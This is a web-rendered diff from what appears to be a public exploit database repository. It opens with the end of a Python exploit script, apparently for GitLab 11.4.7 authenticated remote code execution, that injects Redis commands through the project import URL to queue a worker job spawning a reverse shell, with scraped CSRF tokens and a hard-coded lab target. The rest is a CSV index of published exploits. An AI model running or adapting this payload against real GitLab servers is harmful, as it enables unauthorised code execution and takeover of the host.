|
time.sleep(1)
|
||||||
|
print("[+] Run Exploit with Option 2")
|
||||||
|
|
||||||
|
|
||||||
|
elif option=="2":
|
||||||
|
|
||||||
|
reverse_shell= """\nmulti
|
||||||
|
sadd resque:gitlab:queues system_hook_push
|
||||||
|
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
|
||||||
|
exec
|
||||||
|
exec
|
||||||
|
exec\n"""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
project_page = request.get(gitlab_url+"/projects/new")
|
||||||
|
html_content = project_page.text
|
||||||
|
soup = BeautifulSoup(html_content,features="lxml")
|
||||||
|
project_token = soup.findAll('meta')[16].get("content")
|
||||||
|
namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
|
||||||
|
urlencoded_token1 = project_token.replace("==","%3D%3D")
|
||||||
|
urlencoded_token_final = urlencoded_token1.replace("+","%2B")
|
||||||
|
|
||||||
|
|
||||||
|
payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
proxies = {
|
||||||
|
"http" : "http://127.0.0.1:8080",
|
||||||
|
"https" : "https://127.0.0.1:8080",
|
||||||
|
}
|
||||||
|
|
||||||
|
cookies = {
|
||||||
|
'sidebar_collapsed': 'false',
|
||||||
|
'event_filter': 'all',
|
||||||
|
'hide_auto_devops_implicitly_enabled_banner_1': 'false',
|
||||||
|
'_gitlab_session':request.cookies['_gitlab_session'],
|
||||||
|
}
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
'Host': '10.129.49.31:5080',
|
||||||
|
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
|
||||||
|
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||||
|
'Accept-Language': 'en-US,en;q=0.5',
|
||||||
|
'Accept-Encoding': 'gzip, deflate',
|
||||||
|
'Referer': 'http://10.129.49.31:5080/projects',
|
||||||
|
'Content-Type': 'application/x-www-form-urlencoded',
|
||||||
|
'Content-Length': '398',
|
||||||
|
'Connection': 'close',
|
||||||
|
'Upgrade-Insecure-Requests': '1',
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
|
||||||
|
|
||||||
|
response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
|
||||||
|
print("[+] Success!")
|
||||||
|
time.sleep(1)
|
||||||
|
print("[+] Spawning Reverse Shell")
|
|
@ -11228,7 +11228,7 @@ id,file,description,date,author,type,platform,port
|
||||||
49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
|
49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
|
||||||
49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
|
49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
|
||||||
49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
|
49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
|
||||||
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
|
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,
|
||||||
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
|
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
|
||||||
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
|
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
|
||||||
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
|
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
|
||||||
|
@ -40317,7 +40317,7 @@ id,file,description,date,author,type,platform,port
|
||||||
42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,
|
42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,
|
||||||
42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows,
|
42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows,
|
||||||
41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php,
|
41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php,
|
||||||
41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",webapps,xml,8400
|
41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Tess Sluyter",webapps,xml,8400
|
||||||
41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
||||||
41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
||||||
41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
||||||
|
@ -43481,3 +43481,9 @@ id,file,description,date,author,type,platform,port
|
||||||
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
||||||
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
|
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
|
||||||
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
||||||
|
49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
|
||||||
|
49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
|
||||||
|
49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
|
||||||
|
49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
|
||||||
|
49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,
|
||||||
|
49268,exploits/php/webapps/49268.txt,"Seotoaster 3.2.0 - Stored XSS on Edit page properties",2020-12-16,"Hardik Solanki",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue